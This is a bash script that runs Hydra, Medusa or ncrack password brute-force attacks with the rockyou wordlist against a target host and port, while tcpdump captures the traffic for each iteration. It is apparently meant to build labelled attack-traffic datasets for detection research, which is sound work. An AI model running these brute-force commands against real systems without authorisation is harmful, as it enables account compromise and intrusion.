#!/bin/bash
# 
# SAMPLE:
# ./AutomatedTrafficCapture.sh 10.137.0.21 10.137.0.19 22 ssh 50 5 root Deb10
# 
# 


SRC_IP=$1
DST_IP=$2
DST_PORT=$3
PROT=$4
ITERATIONS=$5
LENGTH=$6
UNAME=$7
OS=$8

echo -n "What should I use? Hydra, Medusa or ncrack (caps matter): "
read WHICH

WORKDIR=Failed_${WHICH}_${OS}_$(date +%H%M%S)
mkdir $WORKDIR
cd $WORKDIR

for i in $(seq 1 $ITERATIONS)
        do
                echo "---------- start tcpdump #$i ------------"
                sudo tcpdump -i eth0 host $SRC_IP and host $DST_IP -w ${WHICH}_${PROT}_${OS}_${i}_$(date +"%T" | sed -e "s/:/-/g").pcap & ttempid=$!
                echo "********** tcpdump PID $ttempid ********"
                case $WHICH in
                        "Hydra")
                                echo "---------  start hydra #$i -------------"
                                hydra -l $UNAME -P /usr/share/wordlists/rockyou.txt -s $DST_PORT $DST_IP $PROT -I & htempid=$!
                                RAND=$(shuf -i10-${LENGTH} -n1)
                                echo "******* Length in seconds $RAND"
                                echo "********* hydra PID $htempid ***********"
                                ;;
                        "Medusa")
                                echo "---------  start medusa #$i -------------"
                                RAND=$(shuf -i10-${LENGTH} -n1)
                                echo "******* Length in seconds $RAND"
                                medusa -h $DST_IP -u $UNAME -P /usr/share/wordlists/rockyou.txt -M $PROT -n $DST_PORT -f & htempid=$!
                                echo "********* medusa PID $htempid ***********"
                                ;;
                        "ncrack")
                                echo "---------  start ncrack #$i -------------"
                                RAND=$(shuf -i10-${LENGTH} -n1)
                                echo "******* Length in seconds $RAND"
                                ncrack $PROT://$DST_IP:$DST_PORT --user $UNAME -P /usr/share/wordlists/rockyou.txt -f -v & htempid=$!
                                echo "********* ncrack PID $htempid ***********"
                                ;;
                        *)
                                echo "Invalid Choice. Press Ctrl+C and start again!"
                esac
                sleep $RAND
                hgid=$(ps xao pid,pgid,comm | grep ${htempid} | awk '{ print $2 }')
                echo "****** HGID $hgid"
                sudo pkill -TERM -P ${hgid}
                sleep 5
                sudo pkill -TERM -P ${ttempid}
                rm hydra.restore
        done

